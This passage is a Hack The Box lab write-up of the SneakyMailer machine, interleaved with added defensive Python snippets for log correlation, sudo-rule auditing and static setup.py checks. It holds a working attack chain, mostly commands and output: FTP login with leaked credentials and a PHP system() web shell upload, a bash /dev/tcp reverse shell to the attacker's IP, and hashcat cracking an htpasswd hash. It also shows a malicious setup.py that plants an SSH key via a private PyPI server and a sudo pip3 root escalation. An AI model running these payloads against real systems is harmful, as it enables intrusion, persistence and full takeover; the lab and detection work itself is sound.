Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C 

Please notify me when you do it

Since I now had credentials, I thought they would most likely log into the PyPI server I found earlier.

There was nothing in packages, nor in the index page.

However, this did not work, nor did logging into SSH. I checked back with my nmap scan to see if there were any other services I could try, and noticed port 21 - FTP was open, so I gave it a try.

FTP Enumeration

┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ ftp 10.10.10.197                                                                              255 ⨯
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:zweilos): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Using the credentials I had found for the developer account I was able to log in through FTP.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    8 0        1001         4096 Nov 11 09:16 dev
226 Directory send OK.
ftp> cd dev
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 May 26 18:52 css
drwxr-xr-x    2 0        0            4096 May 26 18:52 img
-rwxr-xr-x    1 0        0           13742 Jun 23 08:44 index.php
drwxr-xr-x    3 0        0            4096 May 26 18:52 js
drwxr-xr-x    2 0        0            4096 May 26 18:52 pypi
drwxr-xr-x    4 0        0            4096 May 26 18:52 scss
-rwxr-xr-x    1 0        0           26523 May 26 19:58 team.php
drwxr-xr-x    8 0        0            4096 May 26 18:52 vendor
226 Directory send OK.
ftp> get team.php
local: team.php remote: team.php
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for team.php (26523 bytes).
226 Transfer complete.
26523 bytes received in 0.05 secs (557.8464 kB/s)
ftp> cd pypi
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0            3115 May 26 18:52 register.php
226 Directory send OK.
ftp> get register.php
local: register.php remote: register.php
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for register.php (3115 bytes).
226 Transfer complete.
3115 bytes received in 0.00 secs (52.1175 MB/s)
ftp> cd ../vendor
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    4 0        0            4096 May 26 18:52 bootstrap
drwxr-xr-x    2 0        0            4096 May 26 18:52 chart.js
drwxr-xr-x    2 0        0            4096 May 26 18:52 datatables
drwxr-xr-x   10 0        0            4096 May 26 18:52 fontawesome-free
drwxr-xr-x    2 0        0            4096 May 26 18:52 jquery
drwxr-xr-x    2 0        0            4096 May 26 18:52 jquery-easing
226 Directory send OK.
ftp> cd datatables
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0            5799 May 26 18:52 dataTables.bootstrap4.css
-rwxr-xr-x    1 0        0            4693 May 26 18:52 dataTables.bootstrap4.js
-rwxr-xr-x    1 0        0            5222 May 26 18:52 dataTables.bootstrap4.min.css
-rwxr-xr-x    1 0        0            2085 May 26 18:52 dataTables.bootstrap4.min.js
-rwxr-xr-x    1 0        0          448564 May 26 18:52 jquery.dataTables.js
-rwxr-xr-x    1 0        0           82650 May 26 18:52 jquery.dataTables.min.js
226 Directory send OK.
ftp> cd ../
250 Directory successfully changed.
ftp> cd ..
\250 Directory successfully changed.
ftp> get index.php
local: index.php remote: index.php
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for index.php (13742 bytes).
226 Transfer complete.
13742 bytes received in 0.00 secs (21.2061 MB/s)
ftp> cd scss
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0             980 May 26 18:52 _buttons.scss
-rwxr-xr-x    1 0        0             733 May 26 18:52 _cards.scss
-rwxr-xr-x    1 0        0             454 May 26 18:52 _charts.scss
-rwxr-xr-x    1 0        0             356 May 26 18:52 _dropdowns.scss
-rwxr-xr-x    1 0        0            1139 May 26 18:52 _error.scss
-rwxr-xr-x    1 0        0             196 May 26 18:52 _footer.scss
-rwxr-xr-x    1 0        0             886 May 26 18:52 _global.scss
-rwxr-xr-x    1 0        0             893 May 26 18:52 _login.scss
-rwxr-xr-x    1 0        0               1 May 26 18:52 _mixins.scss
-rwxr-xr-x    1 0        0              85 May 26 18:52 _navs.scss
-rwxr-xr-x    1 0        0             239 May 26 18:52 _utilities.scss
-rwxr-xr-x    1 0        0            2477 May 26 18:52 _variables.scss
drwxr-xr-x    2 0        0            4096 May 26 18:52 navs
-rwxr-xr-x    1 0        0             504 May 26 18:52 sb-admin-2.scss
drwxr-xr-x    2 0        0            4096 May 26 18:52 utilities
226 Directory send OK.
ftp> get sb-admin-2.scss
local: sb-admin-2.scss remote: sb-admin-2.scss
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for sb-admin-2.scss (504 bytes).
226 Transfer complete.
504 bytes received in 0.00 secs (3.3379 MB/s)
ftp> cd utilities
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0             596 May 26 18:52 _animation.scss
-rwxr-xr-x    1 0        0             389 May 26 18:52 _background.scss
-rwxr-xr-x    1 0        0             190 May 26 18:52 _border.scss
-rwxr-xr-x    1 0        0              64 May 26 18:52 _display.scss
-rwxr-xr-x    1 0        0              34 May 26 18:52 _progress.scss
-rwxr-xr-x    1 0        0              90 May 26 18:52 _rotate.scss
-rwxr-xr-x    1 0        0             699 May 26 18:52 _text.scss
226 Directory send OK.

I was able to successfully login, and began looking around. It appeared as if the ftp server location and files were the same as the live website. I exfiltrated some of the files to my machine for further analysis, but none of the files seemed to have anything interesting in them.

ftp> put php-code-exec.php
local: php-code-exec.php remote: php-code-exec.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
33 bytes sent in 0.00 secs (233.5258 kB/s)
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 May 26 18:52 css
drwxr-xr-x    2 0        0            4096 May 26 18:52 img
-rwxr-xr-x    1 0        0           13742 Jun 23 08:44 index.php
drwxr-xr-x    3 0        0            4096 May 26 18:52 js
--wxrw-rw-    1 1001     1001           33 Nov 11 12:49 php-code-exec.php
drwxr-xr-x    2 0        0            4096 May 26 18:52 pypi
drwxr-xr-x    4 0        0            4096 May 26 18:52 scss
-rwxr-xr-x    1 0        0           26523 May 26 19:58 team.php
drwxr-xr-x    8 0        0            4096 May 26 18:52 vendor
226 Directory send OK.

After testing some things in the FTP server, I realized that I had the ability to use the PUT command. Since this seemed to be the code for the site, I put a test file to see if I could access it from my browser.

<?php

$var=$_GET['var'];
system($var);

?>

Initial Foothold

Using this I was able to identify that I was running in the context of www-data, and that there were three users that could log into the machine: low, developer, and root.

Next I tried adding my public SSH key to both low and developer since they could log in, but was unable to gain access with SSH since www-data could not write to those files.

Road to User

Further enumeration

I got the running processes and /etc/passwd, could not add SSH keys, and next tried a reverse shell.

GET /php-code-exec.php?var=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.174/46445+0>%261' HTTP/1.1

Host: dev.sneakycorp.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1

I sent my reverse shell and immediately got a connection on my waiting netcat listener.
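
The upload and the request above leave traces in two logs that a defender can join. The following added example (not part of the original writeup) correlates a vsftpd transfer log with a web access log and flags requests that execute a file which arrived over FTP. The log lines are constructed, and it assumes vsftpd runs with xferlog_std_format=YES and that the FTP root maps onto the web root, so basenames match.

```python
import re
from datetime import datetime
from pathlib import PurePosixPath
from urllib.parse import parse_qsl, urlsplit

# Constructed sample logs modelled on the session in this writeup (not real captures).
XFERLOG = """\
Wed Nov 11 12:47:10 2020 1 10.10.14.174 13742 /dev/index.php b _ o r developer ftp 0 * c
Wed Nov 11 12:49:03 2020 1 10.10.14.174 33 /dev/php-code-exec.php b _ i r developer ftp 0 * c
"""
ACCESS_LOG = """\
10.10.14.174 - - [11/Nov/2020:12:50:41 -0500] "GET /index.php HTTP/1.1" 200 13742
10.10.14.174 - - [11/Nov/2020:12:51:02 -0500] "GET /php-code-exec.php?var=id HTTP/1.1" 200 54
10.10.14.174 - - [11/Nov/2020:12:58:19 -0500] "GET /php-code-exec.php?var=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.174/46445+0>%261' HTTP/1.1" 200 0
"""

EXEC_EXT = {".php", ".phtml", ".phar"}            # assumed server-executed extensions
SHELL_HINTS = ("/dev/tcp/", "bash -i", "sh -i")   # matched against the decoded query
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" \d{3}')

def uploaded_scripts(xferlog):
    """Map basename -> (time, ftp_user, client) for completed uploads of executable types."""
    uploads = {}
    for line in xferlog.splitlines():
        f = line.split()
        # xferlog: 5 date tokens, then 13 fields; direction 'i' = incoming, status 'c' = complete
        if len(f) != 18 or f[11] != "i" or f[17] != "c":
            continue
        path = PurePosixPath(f[8])
        if path.suffix.lower() in EXEC_EXT:
            when = datetime.strptime(" ".join(f[:5]), "%a %b %d %H:%M:%S %Y")
            uploads[path.name] = (when, f[13], f[6])
    return uploads

def correlate(xferlog, access_log):
    """Return (file, client, verdict) for each web request that hits an FTP-uploaded script."""
    uploads, alerts = uploaded_scripts(xferlog), []
    for line in access_log.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, stamp, target = m.groups()
        url = urlsplit(target)
        name = PurePosixPath(url.path).name
        # Assumption: both logs are in the server's local time, so the offset is dropped.
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
        if name in uploads and when >= uploads[name][0]:
            decoded = " ".join(value for _, value in parse_qsl(url.query))
            shell = any(hint in decoded for hint in SHELL_HINTS)
            alerts.append((name, client, "shell-syntax" if shell else "executed-upload"))
    return alerts
```

Any hit is worth an alert on its own: a script file that arrived over FTP and is then served by the web server means the FTP account can write into an executed web root.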

zweilos@kali:~/htb/sneakymailer$ script sneaky-transcript
Script started, output log file is 'sneaky-transcript'.
┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ bash                
zweilos@kali:~/htb/sneakymailer$ nc -lvnp 46445
listening on [any] 46445 ...
connect to [10.10.14.174] from (UNKNOWN) [10.10.10.197] 60704
bash: cannot set terminal process group (725): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sneakymailer:~/dev.sneakycorp.htb/dev$ python -c 'import pty;pty.spawn("/bin/bash")'
</dev$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@sneakymailer:~/dev.sneakycorp.htb/dev$ ^Z
[1]+  Stopped                 nc -lvnp 46445
zweilos@kali:~/htb/sneakymailer$ stty raw -echo
zweilos@kali:~/htb/sneakymailer$ nc -lvnp 46445

www-data@sneakymailer:~/dev.sneakycorp.htb/dev$ export TERM=xterm-256color
www-data@sneakymailer:~/dev.sneakycorp.htb/dev$ id && hostname
id && hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sneakymailer

I started enumeration (I remembered to switch to bash this time since zsh seems to have problems with upgrading nc shells).

www-data@sneakymailer:~/sneakycorp.htb$ cd /home
www-data@sneakymailer:/home$ ls
low  vmail
www-data@sneakymailer:/home$ cd vmail
bash: cd: vmail: Permission denied
www-data@sneakymailer:/home$ ls -la
total 16
drwxr-xr-x  4 root  root  4096 May 14 17:10 .
drwxr-xr-x 18 root  root  4096 May 14 05:30 ..
drwxr-xr-x  8 low   low   4096 Jun  8 03:47 low
drwx------  5 vmail vmail 4096 May 19 21:10 vmail

In the /home directory there were only two folders, low and vmail.

www-data@sneakymailer:~/dev.sneakycorp.htb/dev$ ls -la
total 76
drwxrwxr-x 8 root developer  4096 Nov 11 13:23 .
drwxr-xr-x 3 root root       4096 Jun 23 08:15 ..
drwxr-xr-x 2 root root       4096 May 26 19:52 css
drwxr-xr-x 2 root root       4096 May 26 19:52 img
-rwxr-xr-x 1 root root      13742 Jun 23 09:44 index.php
drwxr-xr-x 3 root root       4096 May 26 19:52 js
drwxr-xr-x 2 root root       4096 May 26 19:52 pypi
drwxr-xr-x 4 root root       4096 May 26 19:52 scss
-rwxr-xr-x 1 root root      26523 May 26 20:58 team.php
drwxr-xr-x 8 root root       4096 May 26 19:52 vendor
www-data@sneakymailer:~/dev.sneakycorp.htb/dev$ cd ..
www-data@sneakymailer:~/dev.sneakycorp.htb$ ls
dev
www-data@sneakymailer:~/dev.sneakycorp.htb$ cd ..
www-data@sneakymailer:~$ ls
dev.sneakycorp.htb  html  pypi.sneakycorp.htb  sneakycorp.htb
www-data@sneakymailer:~$ cd pypi.sneakycorp.htb/
www-data@sneakymailer:~/pypi.sneakycorp.htb$ ls -la
total 20
drwxr-xr-x 4 root root     4096 May 15 14:29 .
drwxr-xr-x 6 root root     4096 May 14 18:25 ..
-rw-r--r-- 1 root root       43 May 15 14:29 .htpasswd
drwxrwx--- 2 root pypi-pkg 4096 Jun 30 02:24 packages
drwxr-xr-x 6 root pypi     4096 May 14 18:25 venv
www-data@sneakymailer:~/pypi.sneakycorp.htb$ cat .htpasswd 
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

I found what looked like a hash for a user pypi in .htpasswd in the pypi.sneakycorp.htb folder.

┌──(zweilos㉿kali)-[~]
└─$ hash-identifier hashes                                                          
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

 Not Found.
--------------------------------------------------
 HASH: $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

Possible Hashs:
[+] MD5(APR)
--------------------------------------------------

The hash came up as type MD5(APR).

┌──(zweilos㉿kali)-[~]
└─$ hashcat --help | grep -i APR                                                    
   1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)            | FTP, HTTP, SMTP, LDAP Server

hashcat’s help ID’d it as an Apache MD5 hash.

Finding user creds

┌──(zweilos㉿kali)-[~]
└─$ hashcat -a0 -m1600 --username htb/sneakymailer/hash /usr/share/wordlists/rockyou.txt         
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Host memory required for this attack: 65 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Hash.Target......: $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Time.Started.....: Wed Nov 11 15:52:56 2020 (2 mins, 18 secs)
Time.Estimated...: Wed Nov 11 15:55:14 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    25994 H/s (9.47ms) @ Accel:64 Loops:1000 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 3614208/14344385 (25.20%)
Rejected.........: 0/3614208 (0.00%)
Restore.Point....: 3613952/14344385 (25.19%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidates.#1....: souhern4u -> soucia

Started: Wed Nov 11 15:52:45 2020
Stopped: Wed Nov 11 15:55:16 2020

The password enabled me to log in to http://pypi.sneakycorp.htb:8080/ with the creds pypi:soufianeelhaoui.

However, there was nothing interesting on either of the sites linked on this page.

www-data@sneakymailer:~/pypkg$ su developer
Password: 
developer@sneakymailer:/dev/shm/pypkg$ id
uid=1001(developer) gid=1001(developer) groups=1001(developer)

I went back to the machine and tried to switch users to developer with the credentials mentioned in the email, and found myself logged in as developer.

developer@sneakymailer:/dev/shm/pypkg$ sudo -l

sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
[sudo] password for developer: 
Sorry, try again.
[sudo] password for developer: 
Sorry, user developer may not run sudo on sneakymailer.

I had a weird network hiccup that caused authentication to fail on the first try, but then I found out that this user was not able to run commands with sudo.

https://pypi.org/project/pypiserver/#upload-with-setuptools

On client-side, edit or create a ~/.pypirc file with a similar content:

    [distutils]
    index-servers =
      pypi
      local

    [pypi]
    username:<your_pypi_username>
    password:<your_pypi_passwd>

    [local]
    repository: http://localhost:8080
    username: <some_username>
    password: <some_passwd>

Then from within the directory of the python-project you wish to upload, issue this command:

    python setup.py sdist upload -r local

Then I wrote a setup.py Python script as specified at https://packaging.python.org/tutorials/packaging-projects/#creating-setup-py

import setuptools
import os

if os.getuid() == 1000:
    with open("/home/low/.ssh/authorized_keys", "a") as fh:
        fh.write("\necdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCOQVWrtHkqJofpMNDvUFQlPj7KHcLwMRo5BghGIW8tEAdl2yU0GQ03g2gKnUE9bDGP5NCW6uuEBxSUw73QCYws= zweilos@kali")

long_description = "A sneaky pwn package"

setuptools.setup(
    name="sneakymailer-pwn", # Replace with your own username
    version="0.0.1",
    author="zweilos",
    author_email="zweilos@sneakymailer.htb",
    description="A small pwny package",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires='>=3.6',
)

I first tried writing my public SSH key to low, but the script was being run in the context of developer and not being installed for some reason. I added a check to make sure that low (userID 1000) was the one running it. Next I followed the instructions to install the package into pypiserver.

[distutils]
index-servers =
  pypi
  local

[pypi]
username:pypi
password:soufianeelhaoui

[local]
repository: http://pypi.sneakycorp.htb:8080
username:pypi
password:soufianeelhaoui

I created the .pypirc file in my distribution’s directory, then set this to be developer’s home directory with export HOME=/dev/shm/pypi

User.txt

developer@sneakymailer:~$ python3 setup.py sdist register -r local upload -r local
running sdist
running egg_info
writing sneakymailer_pwn.egg-info/PKG-INFO
writing dependency_links to sneakymailer_pwn.egg-info/dependency_links.txt
writing top-level names to sneakymailer_pwn.egg-info/top_level.txt
reading manifest file 'sneakymailer_pwn.egg-info/SOURCES.txt'
writing manifest file 'sneakymailer_pwn.egg-info/SOURCES.txt'
warning: sdist: standard file not found: should have one of README, README.rst, README.txt, README.md

running check
creating sneakymailer-pwn-0.0.1
creating sneakymailer-pwn-0.0.1/sneakymailer_pwn.egg-info
copying files to sneakymailer-pwn-0.0.1...
copying setup.py -> sneakymailer-pwn-0.0.1
copying sneakymailer_pwn.egg-info/PKG-INFO -> sneakymailer-pwn-0.0.1/sneakymailer_pwn.egg-info
copying sneakymailer_pwn.egg-info/SOURCES.txt -> sneakymailer-pwn-0.0.1/sneakymailer_pwn.egg-info
copying sneakymailer_pwn.egg-info/dependency_links.txt -> sneakymailer-pwn-0.0.1/sneakymailer_pwn.egg-info
copying sneakymailer_pwn.egg-info/top_level.txt -> sneakymailer-pwn-0.0.1/sneakymailer_pwn.egg-info
Writing sneakymailer-pwn-0.0.1/setup.cfg
Creating tar archive
removing 'sneakymailer-pwn-0.0.1' (and everything under it)
running register
Registering sneakymailer-pwn to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Registering is deprecated, use twine to upload instead (https://pypi.org/p/twine/)
running upload
Submitting dist/sneakymailer-pwn-0.0.1.tar.gz to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Uploading via this command is deprecated, use twine to upload instead (https://pypi.org/p/twine/)

It complained a bit that I didn’t create a readme, but it ran.

┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ ssh -i dev low@sneakycorp.htb   
The authenticity of host 'sneakycorp.htb (10.10.10.197)' can't be established.
ECDSA key fingerprint is SHA256:I1lCFRteozDGkqC/ZSE2SbHl8ISpJWhfu5nwn6LxbA0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'sneakycorp.htb' (ECDSA) to the list of known hosts.
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Tue Jun  9 03:02:52 2020 from 192.168.56.105
low@sneakymailer:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip3
low@sneakymailer:~$ cat user.txt 
06106e8ea4721e1a01714bf6ef000a88

Next I tried logging in with the SSH key I had made and was successful! I got that same temporary name resolution error when using sudo -l, where it seemed to hang for a minute, but this time I got a very interesting result!
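
A sudo rule like the one above can be caught in a configuration review. This added example (not part of the original writeup) parses `sudo -l` output and flags rules that hand a code-running program to another user; the CODE_RUNNERS set and the second sample are constructed for illustration.

```python
import re
from pathlib import PurePosixPath

# `sudo -l` output as shown in this writeup.
SUDO_L = """\
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip3
"""
# Constructed second sample: an argument-pinned command and a password-protected one.
SUDO_L_PINNED = """\
User ops may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
    (deploy) /usr/bin/python3
"""

# Small hand-picked set of programs that run caller-supplied code by design (not exhaustive).
CODE_RUNNERS = {"pip", "pip3", "python", "python3", "perl", "ruby", "gem", "npm",
                "vim", "find", "env", "bash", "sh"}
# "(runas) TAG: TAG: command[, command ...]" as printed under the "may run" header.
ENTRY = re.compile(r"^\s+\(([^)]+)\)\s+((?:[A-Z_]+:\s*)*)(.+)$")

def audit_sudo_l(text):
    """Return (runas, command, nopasswd, issue) per rule; issue is None when nothing is flagged."""
    results, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # everything before this is the Defaults section
            continue
        m = ENTRY.match(line) if in_rules else None
        if not m:
            continue
        runas, tags, commands = m.groups()
        nopasswd = "NOPASSWD:" in tags.split()
        for command in (c.strip() for c in commands.split(",")):
            binary, _, args = command.partition(" ")
            name = PurePosixPath(binary).name
            if binary == "ALL":
                issue = "any-command"
            elif name in CODE_RUNNERS and not args:
                issue = "code-runner-any-args"    # no argument list: caller picks the arguments
            elif name in CODE_RUNNERS:
                issue = "code-runner-fixed-args"  # pinned arguments still need a manual look
            else:
                issue = None
            results.append((runas, command, nopasswd, issue))
    return results
```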

low@sneakymailer:/dev/shm/fin$ pip3 install setup.py
Looking in indexes: http://pypi.sneakycorp.htb:8080/simple/
Collecting setup.py
  The repository located at pypi.sneakycorp.htb is not a trusted or secure host and is being ignored. If this repository is available via HTTPS we recommend you use HTTPS instead, otherwise you may silence this warning and allow it anyway with '--trusted-host pypi.sneakycorp.htb'.                            
  Could not find a version that satisfies the requirement setup.py (from versions: )
No matching distribution found for setup.py

A search for ways to escalate privileges with sudo and pip3 led to https://gtfobins.github.io/gtfobins/pip/

File write

It writes data to files, it may be used to do privileged writes or write files outside a restricted file system.

It needs an absolute local file path.

    export LFILE=/tmp/file_to_save
    TF=$(mktemp -d)
    echo "open('$LFILE','w+').write('DATA')" > $TF/setup.py
    pip install $TF
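
Both the setup.py uploaded to pypiserver earlier and the GTFOBins snippet above work because pip runs a source package's setup.py at install time with the installer's privileges. As an added example (not from the original writeup or from pip), this static check parses a setup.py without executing it and lists install-time side effects; the indicator lists are hand-picked assumptions.

```python
import ast

# setup.py from this writeup, trimmed; the SSH key is replaced by a placeholder.
WRITEUP_SETUP = '''\
import setuptools
import os

if os.getuid() == 1000:
    with open("/home/low/.ssh/authorized_keys", "a") as fh:
        fh.write("\\necdsa-sha2-nistp256 <KEY-PLACEHOLDER> user@host")

setuptools.setup(name="sneakymailer-pwn", version="0.0.1",
                 packages=setuptools.find_packages())
'''
# setup.py as generated by the quoted GTFOBins file-write snippet, $LFILE expanded.
GTFOBINS_SETUP = "open('/tmp/file_to_save','w+').write('DATA')\n"

# Hand-picked indicator lists (assumptions of this example, not exhaustive).
EXEC_CALLS = {"eval", "exec", "__import__", "os.system", "os.popen"}
EXEC_PREFIXES = ("subprocess.", "os.exec", "os.spawn", "pty.")
IDENTITY_CALLS = {"os.getuid", "os.geteuid", "getpass.getuser", "socket.gethostname"}
SENSITIVE = ("authorized_keys", "/.ssh/", "/etc/", "/root/")

def dotted(node):
    """Turn a Name/Attribute chain into 'os.getuid'; return '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        return ".".join([node.id] + parts[::-1])
    return ""

def open_mode(call):
    """Literal mode of an open() call: 'r' when omitted, '?' when not a string literal."""
    mode = call.args[1] if len(call.args) > 1 else None
    for kw in call.keywords:
        if kw.arg == "mode":
            mode = kw.value
    if mode is None:
        return "r"
    is_literal = isinstance(mode, ast.Constant) and isinstance(mode.value, str)
    return mode.value if is_literal else "?"

def audit_setup(source):
    """Parse (never execute) a setup.py and list install-time side effects, sorted by line."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted(node.func)
            if name == "open" and set(open_mode(node)) & set("wax+?"):
                findings.append((node.lineno, "file-write", open_mode(node)))
            elif name in EXEC_CALLS or name.startswith(EXEC_PREFIXES):
                findings.append((node.lineno, "process-exec", name))
            elif name in IDENTITY_CALLS:
                findings.append((node.lineno, "identity-check", name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(marker in node.value for marker in SENSITIVE):
                findings.append((node.lineno, "sensitive-path", node.value))
    return sorted(findings)
```

Aliased imports such as `from os import system` are not resolved, so an empty result means nothing obvious was found, not that the package is safe to install as root.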

Path to Power (Gaining Administrator Access)

Enumeration as User

Getting a shell

low@sneakymailer:/dev/shm$ TF=$(mktemp -d)
low@sneakymailer:/dev/shm$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
low@sneakymailer:/dev/shm$ sudo pip3 install $TF
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /tmp/tmp.eLbVbsYr88
# id && hostname
uid=0(root) gid=0(root) groups=0(root)
sneakymailer
# cat root.txt  
cat: root.txt: No such file or directory
# ls -la
total 20
drwx------  3 root root 4096 Nov 11 20:49 .
drwxrwxrwt 16 root root 4096 Nov 11 20:49 ..
-rw-r--r--  1 root root  185 Nov 11 20:49 pip-delete-this-directory.txt
drwxr-xr-x  2 root root 4096 Nov 11 20:49 pip-egg-info
-rw-r--r--  1 root root   86 Nov 11 20:49 setup.py
# pwd
/tmp/pip-req-build-2ueqz020

I was not in the directory I expected at first; the shell spawned in the tmp directory that the “module” was installed to.

Root.txt

# cd /root
# ls -la
total 44
drwx------  6 root root 4096 Jun 10 04:20 .
drwxr-xr-x 18 root root 4096 May 14 05:30 ..
lrwxrwxrwx  1 root root    9 May 26 22:32 .bash_history -> /dev/null
-rw-r--r--  1 root root  619 May 14 12:57 .bashrc
drwxr-xr-x  3 root root 4096 May 14 15:29 .cache
drwx------  3 root root 4096 Jun 10 04:20 .config
drwx------  3 root root 4096 May 15 13:10 .gnupg
drwxr-xr-x  3 root root 4096 May 14 12:57 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root  977 May 14 13:31 .python_history
-rwx------  1 root root   33 Nov 11 01:09 root.txt
-rw-r--r--  1 root root   66 May 27 13:00 .selected_editor
# cat root.txt
81337e5b7eb0c72e251736d031a72998

fine

Thanks to <box_creator> for something interesting or useful about this machine.

If you have comments, issues, or other feedback, or have any other fun or useful tips or tricks to share, feel free to contact me on Github at https://github.com/zweilosec or in the comments below!

If you like this content and would like to see more, please consider buying me a coffee!

This post is licensed under CC BY 4.0 by the author.